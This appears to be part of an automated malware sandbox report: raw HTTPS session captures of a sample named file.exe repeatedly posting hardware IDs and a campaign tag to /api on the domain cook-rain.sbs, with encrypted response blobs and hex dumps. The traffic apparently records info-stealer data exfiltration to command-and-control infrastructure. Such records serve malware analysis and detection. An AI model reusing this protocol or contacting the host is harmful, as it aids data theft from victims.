                                                                            Set-Cookie: PHPSESSID=ljkocodn8kjifku3hvhv3khp2t; expires=Mon, 17-Mar-2025 05:56:56 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1ZD6A2qPTfOw1JkMiVZtK4eTJvtjzBgmzyOelk3sNzkNH%2BMGzvbqzktx4Y0NC0jf90Sh7M6twvuvguGPT3GlUIzwXHkXQ895%2Br0WoJX1plmnuKjTPFvA4ymJvwbTW9g"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e6093619c6e7c8d-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1851&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=1443400&cwnd=171&unsent_bytes=0&cid=370b5456750fc527&ts=720&x=0"
                                                                            2024-11-21 12:10:17 UTC391INData Raw: 34 34 36 63 0d 0a 74 2b 55 53 4c 57 66 31 76 53 35 39 70 56 33 58 38 35 4e 47 36 43 42 6d 59 38 74 77 74 76 69 42 4e 55 58 72 79 53 37 6c 49 6b 54 4d 78 32 51 50 58 63 47 52 44 41 37 41 66 2b 32 48 34 54 4f 4e 44 45 51 43 72 31 4b 4d 6e 75 42 5a 4e 6f 37 6c 44 4a 4e 50 5a 6f 32 44 63 30 45 55 6b 4a 45 4d 47 4e 31 2f 37 61 6a 6f 5a 49 31 4f 52 46 6e 70 46 64 79 61 34 46 6b 6e 69 71 4a 42 6c 55 34 6e 33 34 6c 31 52 51 4b 57 32 55 38 52 79 44 69 79 6c 76 49 73 68 6b 6b 4c 43 36 5a 53 6d 74 72 6b 54 32 66 52 36 32 4f 41 56 69 58 36 68 47 46 47 52 59 69 52 56 56 2f 41 4d 2f 58 4a 73 53 65 4e 51 67 6f 46 72 78 76 65 6b 4f 6c 52 4a 6f 2b 6a 58 6f 78 45 4c 4e 2b 48 64 6b 51 49 6e 38 31 43 47 38 38 7a 74 4a 7a 79 5a 4d 51 43 41 78 6e 70 53 70 54 4a 30 56 51 32 6d
                                                                            Data Ascii: 446ct+USLWf1vS59pV3X85NG6CBmY8twtviBNUXryS7lIkTMx2QPXcGRDA7Af+2H4TONDEQCr1KMnuBZNo7lDJNPZo2Dc0EUkJEMGN1/7ajoZI1ORFnpFdya4FkniqJBlU4n34l1RQKW2U8RyDiylvIshkkLC6ZSmtrkT2fR62OAViX6hGFGRYiRVV/AM/XJsSeNQgoFrxvekOlRJo+jXoxELN+HdkQIn81CG88ztJzyZMQCAxnpSpTJ0VQ2m
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 59 63 77 41 55 57 51 78 77 78 48 68 78 79 77 67 66 59 6f 6e 41 41 2b 51 62 5a 63 7a 64 72 6b 57 32 66 52 36 30 53 43 51 79 58 65 69 48 4e 48 44 6f 58 66 58 68 6e 4b 4f 71 65 58 39 43 71 41 51 52 59 4c 70 78 54 58 6b 2b 68 65 49 6f 36 76 44 4d 6b 41 49 63 33 48 4b 41 38 6b 6d 74 52 41 46 64 41 2f 39 59 36 2f 50 63 70 46 43 45 48 78 55 74 43 62 35 31 59 6a 68 36 56 49 69 30 59 6f 32 49 68 32 52 51 57 51 31 55 51 58 78 6a 4b 2b 6e 76 45 68 68 30 59 43 44 61 67 58 6c 4e 53 6a 55 44 2f 4a 38 77 79 70 52 79 58 48 78 55 56 4d 43 35 6e 59 57 6c 2f 59 63 61 7a 52 39 69 6a 4b 47 6b 51 50 72 42 33 47 6d 2f 46 53 4b 5a 75 6e 53 59 46 4e 4a 64 75 48 64 55 67 49 6d 64 6c 4c 48 4d 38 37 74 4a 2f 39 4c 6f 6c 47 42 30 48 6e 55 74 4f 43 6f 77 39 6e 75 4b 68 49 67 46 49 6c
                                                                            Data Ascii: YcwAUWQxwxHhxywgfYonAA+QbZczdrkW2fR60SCQyXeiHNHDoXfXhnKOqeX9CqAQRYLpxTXk+heIo6vDMkAIc3HKA8kmtRAFdA/9Y6/PcpFCEHxUtCb51Yjh6VIi0Yo2Ih2RQWQ1UQXxjK+nvEhh0YCDagXlNSjUD/J8wypRyXHxUVMC5nYWl/YcazR9ijKGkQPrB3Gm/FSKZunSYFNJduHdUgImdlLHM87tJ/9LolGB0HnUtOCow9nuKhIgFIl
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 67 42 6d 39 5a 42 47 63 63 34 73 5a 54 6a 49 59 4e 4f 43 45 48 6e 55 74 4f 43 6f 77 39 6e 70 71 78 61 68 47 38 6c 78 49 34 77 55 45 75 4f 6e 30 73 54 68 32 66 31 6c 76 51 73 67 55 51 4d 41 62 73 58 32 70 48 69 58 53 47 49 70 6b 43 42 51 43 66 56 67 58 78 50 41 70 44 4e 58 68 72 42 4c 62 2f 52 76 32 53 4e 57 6b 52 5a 36 53 54 45 6a 66 4a 42 5a 62 79 6f 51 6f 6c 48 4d 4a 57 59 50 6c 5a 46 6b 4e 4d 4d 52 34 63 30 74 5a 33 32 4c 49 78 47 44 41 36 6d 47 38 61 62 37 31 6b 31 6a 71 74 46 69 55 38 71 33 49 70 33 51 67 36 64 30 6b 67 59 78 6e 2f 37 30 66 59 38 79 68 70 45 4e 37 6b 66 32 4c 54 6f 57 79 37 4a 74 41 4b 65 41 43 48 5a 78 79 67 50 41 5a 76 58 52 68 44 4f 4e 62 2b 65 2b 43 53 43 53 77 30 43 71 52 37 53 6d 2b 39 62 4b 6f 79 6f 53 59 70 46 4a 74 6d 41 64
                                                                            Data Ascii: gBm9ZBGcc4sZTjIYNOCEHnUtOCow9npqxahG8lxI4wUEuOn0sTh2f1lvQsgUQMAbsX2pHiXSGIpkCBQCfVgXxPApDNXhrBLb/Rv2SNWkRZ6STEjfJBZbyoQolHMJWYPlZFkNMMR4c0tZ32LIxGDA6mG8ab71k1jqtFiU8q3Ip3Qg6d0kgYxn/70fY8yhpEN7kf2LToWy7JtAKeACHZxygPAZvXRhDONb+e+CSCSw0CqR7Sm+9bKoyoSYpFJtmAd
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 66 46 46 2f 4c 50 4c 6d 5a 2f 69 4b 44 54 67 34 49 6f 68 37 66 6e 75 39 65 49 6f 2b 71 53 59 4a 42 49 74 6d 4e 64 6b 77 47 6d 4e 42 44 46 34 64 78 39 5a 62 70 5a 4e 49 43 49 52 61 69 48 4e 4c 61 2f 42 6b 2b 79 61 78 41 78 78 68 6d 32 59 35 32 53 51 43 62 33 6b 6f 58 77 6a 65 78 6b 50 63 69 69 55 30 41 42 4b 67 64 30 4a 62 74 58 53 61 49 70 30 65 49 53 79 4f 56 79 54 42 49 48 64 65 48 44 43 37 45 4b 61 4b 42 2f 57 53 56 44 42 31 42 72 68 36 55 77 71 4e 57 4e 59 4f 68 51 6f 4a 50 49 39 61 49 64 30 49 44 6d 39 56 46 46 38 45 77 76 49 50 79 4b 49 52 46 43 67 32 6e 48 39 36 5a 37 68 64 70 79 61 78 55 78 78 68 6d 2b 59 42 39 59 51 36 62 32 41 77 41 69 53 62 31 6c 76 31 6b 30 67 49 49 43 36 55 62 31 4a 50 6d 58 79 79 41 72 6b 32 4d 52 53 58 54 69 6e 39 47 46 35
                                                                            Data Ascii: fFF/LPLmZ/iKDTg4Ioh7fnu9eIo+qSYJBItmNdkwGmNBDF4dx9ZbpZNICIRaiHNLa/Bk+yaxAxxhm2Y52SQCb3koXwjexkPciiU0ABKgd0JbtXSaIp0eISyOVyTBIHdeHDC7EKaKB/WSVDB1Brh6UwqNWNYOhQoJPI9aId0IDm9VFF8EwvIPyKIRFCg2nH96Z7hdpyaxUxxhm+YB9YQ6b2AwAiSb1lv1k0gIIC6Ub1JPmXyyArk2MRSXTin9GF5
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 68 7a 6d 36 6d 50 49 72 69 30 73 49 44 4b 77 62 30 5a 76 6c 55 79 32 44 71 30 71 42 51 53 50 66 68 48 46 46 44 4a 44 58 53 78 7a 56 66 2f 76 52 39 6a 7a 4b 47 6b 51 6f 72 67 44 61 69 71 4e 49 61 5a 44 72 53 34 73 41 66 70 57 44 65 6b 41 42 6b 4e 4e 4b 47 73 45 79 74 4a 37 77 4a 49 56 47 44 77 69 76 45 39 6d 66 37 6c 4d 31 67 36 42 44 69 30 6b 71 32 4d 63 2b 44 77 4b 50 6e 78 52 66 39 6a 4b 37 6e 2f 59 79 79 6c 31 4b 47 4f 6b 56 32 4e 71 37 46 79 61 46 70 45 2b 49 51 79 58 55 6a 57 4a 64 43 5a 37 58 53 52 50 4d 4d 62 4f 44 39 79 75 44 51 51 63 49 72 68 72 59 6b 4f 42 51 5a 38 66 72 53 35 38 41 66 70 57 6b 5a 31 38 49 31 38 41 43 42 6f 63 34 75 64 47 70 5a 49 4a 50 44 41 75 74 46 64 6d 64 35 56 34 31 67 4b 35 43 68 30 51 74 32 6f 46 30 54 41 57 46 32 55 67
                                                                            Data Ascii: hzm6mPIri0sIDKwb0ZvlUy2Dq0qBQSPfhHFFDJDXSxzVf/vR9jzKGkQorgDaiqNIaZDrS4sAfpWDekABkNNKGsEytJ7wJIVGDwivE9mf7lM1g6BDi0kq2Mc+DwKPnxRf9jK7n/Yyyl1KGOkV2Nq7FyaFpE+IQyXUjWJdCZ7XSRPMMbOD9yuDQQcIrhrYkOBQZ8frS58AfpWkZ18I18ACBoc4udGpZIJPDAutFdmd5V41gK5Ch0Qt2oF0TAWF2Ug
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 39 48 32 50 4d 6f 61 52 43 43 79 45 64 69 58 6f 30 68 70 6b 4f 74 4c 69 77 42 2b 6c 59 74 2b 53 67 57 64 32 55 67 61 77 54 57 77 6b 66 6f 6e 68 55 59 43 42 61 59 53 33 35 50 69 55 53 4b 44 6f 45 71 4b 51 79 44 54 78 7a 34 50 41 6f 2b 66 46 46 2f 6e 4a 4c 69 64 39 6d 53 56 44 42 31 42 72 68 36 55 77 71 4e 63 4b 34 32 73 54 49 70 44 4c 74 43 44 65 6b 6f 46 6e 38 31 45 48 38 41 74 70 35 48 34 49 59 5a 42 42 41 57 76 47 39 4b 5a 35 78 64 70 79 61 78 55 78 78 68 6d 2b 49 74 33 5a 67 4b 4d 6e 31 4e 52 33 6e 2b 79 6e 62 46 38 79 6b 4d 50 43 36 59 66 31 35 7a 67 58 43 4b 44 71 6b 75 50 54 54 54 57 69 48 39 4c 42 5a 6a 5a 53 68 37 49 4f 62 4b 59 38 43 79 4e 41 6b 70 42 72 67 71 55 77 71 4e 35 49 49 71 76 44 4a 67 4f 50 35 57 41 66 41 39 64 31 39 39 47 46 63 30 78
                                                                            Data Ascii: 9H2PMoaRCCyEdiXo0hpkOtLiwB+lYt+SgWd2UgawTWwkfonhUYCBaYS35PiUSKDoEqKQyDTxz4PAo+fFF/nJLid9mSVDB1Brh6UwqNcK42sTIpDLtCDekoFn81EH8Atp5H4IYZBBAWvG9KZ5xdpyaxUxxhm+It3ZgKMn1NR3n+ynbF8ykMPC6Yf15zgXCKDqkuPTTTWiH9LBZjZSh7IObKY8CyNAkpBrgqUwqN5IIqvDJgOP5WAfA9d199GFc0x
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 72 4b 57 6b 52 5a 36 53 66 58 6c 4f 31 51 4d 5a 6a 6d 61 35 46 4b 49 63 57 41 5a 30 42 46 32 5a 39 4b 58 35 39 73 2b 39 48 31 4e 63 6f 61 56 46 50 79 52 34 66 4e 73 77 55 34 78 37 49 4d 6b 51 42 2b 68 38 6b 77 58 55 58 50 6e 77 73 63 31 53 32 7a 6b 75 63 6e 7a 58 77 36 4a 72 4d 66 30 6f 33 79 61 52 6d 4f 73 55 47 42 56 7a 65 5a 6b 6e 4e 42 43 35 44 4a 44 46 47 48 4d 50 58 4a 79 47 54 43 41 6a 74 50 36 51 71 55 77 71 4e 69 4a 49 65 6c 53 35 46 52 61 2f 4b 64 66 55 6b 53 68 70 38 43 58 38 46 2f 37 63 47 2f 5a 49 35 54 52 46 6e 35 51 49 2f 50 73 41 42 33 32 37 51 43 6e 67 41 77 6c 64 38 69 41 55 57 46 6e 78 52 66 67 44 79 6e 67 2f 63 6e 6e 45 46 44 50 35 63 38 30 35 7a 6d 55 44 66 4c 68 55 65 54 52 32 61 62 78 33 38 50 58 61 36 66 42 46 2f 34 63 66 57 4a 73
                                                                            Data Ascii: rKWkRZ6SfXlO1QMZjma5FKIcWAZ0BF2Z9KX59s+9H1NcoaVFPyR4fNswU4x7IMkQB+h8kwXUXPnwsc1S2zkucnzXw6JrMf0o3yaRmOsUGBVzeZknNBC5DJDFGHMPXJyGTCAjtP6QqUwqNiJIelS5FRa/KdfUkShp8CX8F/7cG/ZI5TRFn5QI/PsAB327QCngAwld8iAUWFnxRfgDyng/cnnEFDP5c805zmUDfLhUeTR2abx38PXa6fBF/4cfWJs
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 56 51 66 46 43 68 73 47 32 42 48 44 5a 2b 56 50 4a 57 57 62 44 78 79 67 64 53 39 66 4e 44 45 65 48 65 4c 61 44 34 79 4b 4a 56 41 64 47 6c 79 7a 7a 6c 4f 52 57 4d 5a 6d 38 51 38 68 75 45 50 53 35 54 6c 6f 47 6d 64 46 4c 43 64 5a 2f 2b 39 48 2b 5a 4e 4a 37 52 45 6e 70 4c 5a 72 61 2b 78 64 2f 79 5a 35 50 69 55 34 68 77 35 59 39 61 41 75 51 33 6c 6f 50 30 44 44 36 76 38 63 46 79 67 78 45 42 2b 6c 4b 68 74 53 6a 55 7a 62 4a 38 78 7a 56 47 33 4f 47 30 43 41 64 47 74 6e 47 44 41 6d 48 5a 2b 66 66 73 54 62 4b 47 6b 52 47 71 67 44 47 6e 4f 42 42 4a 4d 36 56 63 71 42 4f 49 64 53 52 59 45 49 4a 74 74 78 64 46 66 6b 42 6f 4a 4c 2f 4b 6f 31 55 46 55 48 6e 55 74 76 61 75 32 35 6e 77 65 74 7a 79 51 41 2b 6c 64 38 77 65 67 61 5a 30 55 73 4a 31 6e 4b 53 6e 2f 59 6c 6e 46
                                                                            Data Ascii: VQfFChsG2BHDZ+VPJWWbDxygdS9fNDEeHeLaD4yKJVAdGlyzzlORWMZm8Q8huEPS5TloGmdFLCdZ/+9H+ZNJ7REnpLZra+xd/yZ5PiU4hw5Y9aAuQ3loP0DD6v8cFygxEB+lKhtSjUzbJ8xzVG3OG0CAdGtnGDAmHZ+ffsTbKGkRGqgDGnOBBJM6VcqBOIdSRYEIJttxdFfkBoJL/Ko1UFUHnUtvau25nwetzyQA+ld8wegaZ0UsJ1nKSn/YlnF
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 45 5a 54 55 6f 30 39 6e 30 65 74 68 6c 55 63 32 31 73 56 63 53 41 69 62 6e 31 4e 52 33 6e 2b 6a 30 61 6c 33 78 41 49 57 51 66 46 53 6b 35 6e 78 52 53 47 4b 76 55 2f 41 66 68 6a 34 6c 58 64 66 42 74 58 75 51 52 76 52 4b 72 61 42 39 68 71 30 62 78 59 47 75 52 47 57 76 39 6b 56 46 70 2b 6f 54 49 6c 48 5a 70 76 48 61 41 39 64 31 2f 4a 65 47 4e 63 38 39 37 54 4c 5a 72 74 55 42 77 47 6e 46 5a 53 46 72 55 35 6e 6e 2b 73 55 31 41 35 6d 78 38 63 6f 44 30 4b 5a 30 6b 30 63 79 54 79 6e 67 2f 63 6e 6e 45 46 44 50 35 63 39 33 35 76 7a 57 6a 61 45 72 31 71 35 66 67 48 54 67 6e 64 78 4f 36 44 4f 53 77 2b 46 47 62 61 48 38 6d 54 45 41 68 78 42 38 56 4c 7a 6e 4f 5a 51 5a 38 66 72 53 4d 63 59 5a 76 71 4d 63 56 38 49 68 74 4a 49 43 59 55 59 73 35 54 32 5a 4d 51 43 43 45 48
                                                                            Data Ascii: EZTUo09n0ethlUc21sVcSAibn1NR3n+j0al3xAIWQfFSk5nxRSGKvU/Afhj4lXdfBtXuQRvRKraB9hq0bxYGuRGWv9kVFp+oTIlHZpvHaA9d1/JeGNc897TLZrtUBwGnFZSFrU5nn+sU1A5mx8coD0KZ0k0cyTyng/cnnEFDP5c935vzWjaEr1q5fgHTgndxO6DOSw+FGbaH8mTEAhxB8VLznOZQZ8frSMcYZvqMcV8IhtJICYUYs5T2ZMQCCEH


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1049718188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:19 UTC276OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=AVORIOJXV765HT2
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12835
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:19 UTC12835OUTData Raw: 2d 2d 41 56 4f 52 49 4f 4a 58 56 37 36 35 48 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 41 56 4f 52 49 4f 4a 58 56 37 36 35 48 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 56 4f 52 49 4f 4a 58 56 37 36 35 48 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                            Data Ascii: --AVORIOJXV765HT2Content-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--AVORIOJXV765HT2Content-Disposition: form-data; name="pid"2--AVORIOJXV765HT2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                            2024-11-21 12:10:20 UTC984INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=s5hlgeulg87gfaqmuuvc1os9hk; expires=Mon, 17-Mar-2025 05:56:58 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8F6gSgIjjlagONGL3N7ouFxc%2FGEwo9uwgDOX9glXHU7OEFx8dX6Jl8fDYBjjDXOLBOpINqbJZ0GZ%2FsNRda7GtISJZPV9Wk%2B1XYCFHWGdGiftQgBa2l2wiJzGovbr8H65"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60936fbb1743c9-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2828&recv_bytes=13769&delivery_rate=1752701&cwnd=230&unsent_bytes=0&cid=20154bc03e17ad5b&ts=935&x=0"
                                                                            2024-11-21 12:10:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1049724188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:21 UTC278OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=92XN0U0NYXL5IDP46
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15074
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:21 UTC15074OUTData Raw: 2d 2d 39 32 58 4e 30 55 30 4e 59 58 4c 35 49 44 50 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 39 32 58 4e 30 55 30 4e 59 58 4c 35 49 44 50 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 32 58 4e 30 55 30 4e 59 58 4c 35 49 44 50 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                            Data Ascii: --92XN0U0NYXL5IDP46Content-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--92XN0U0NYXL5IDP46Content-Disposition: form-data; name="pid"2--92XN0U0NYXL5IDP46Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                            2024-11-21 12:10:22 UTC989INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:22 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=5kkb5g4md8qcd7s0ctnibnfepl; expires=Mon, 17-Mar-2025 05:57:01 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdfQ%2FGmXLeQrzk198muDzl0xYgcdnx7Y8rjzwWF%2F4oGmAuCjDc47%2BNo5pnZq%2BzRPlZFg3B2ztJqsi8SeLZdrsCFnmZeOp%2BUHyyRI5XbZ5BHaz5t1nIKogj91D81je7Ly"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60937eaf130f59-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2021&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16010&delivery_rate=1756919&cwnd=227&unsent_bytes=0&cid=7605d90a315e4b1b&ts=917&x=0"
                                                                            2024-11-21 12:10:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1049730188.114.97.34437748C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-21 12:10:24 UTC280OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=KOV1MUE2Z06Q37QAMKS
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20448
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:24 UTC15331OUTData Raw: 2d 2d 4b 4f 56 31 4d 55 45 32 5a 30 36 51 33 37 51 41 4d 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4b 4f 56 31 4d 55 45 32 5a 30 36 51 33 37 51 41 4d 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 4f 56 31 4d 55 45 32 5a 30 36 51 33 37 51 41 4d 4b 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                            Data Ascii: --KOV1MUE2Z06Q37QAMKSContent-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--KOV1MUE2Z06Q37QAMKSContent-Disposition: form-data; name="pid"3--KOV1MUE2Z06Q37QAMKSContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                            2024-11-21 12:10:24 UTC5117OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: `?lpQ0/74G6(~
                                                                            2024-11-21 12:10:24 UTC986INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:24 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=6vake9vqa69ln1ldmn7p0up4rd; expires=Mon, 17-Mar-2025 05:57:03 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khG%2F3LlfaDko0zvHYDrBjwXuycTD7wQJB38AsuT3eJkDyQfUuj4%2FdqA0zg77qk5kPs3iK2wysq6K%2BUxKESMk8haoDGHQtcegPWzQFBmuKaLF9ZRHj1B5vO%2FSGlxxaA1X"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60938d6f0942cb-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1643&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21408&delivery_rate=1819314&cwnd=175&unsent_bytes=0&cid=d6f112d560002c54&ts=866&x=0"
                                                                            2024-11-21 12:10:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
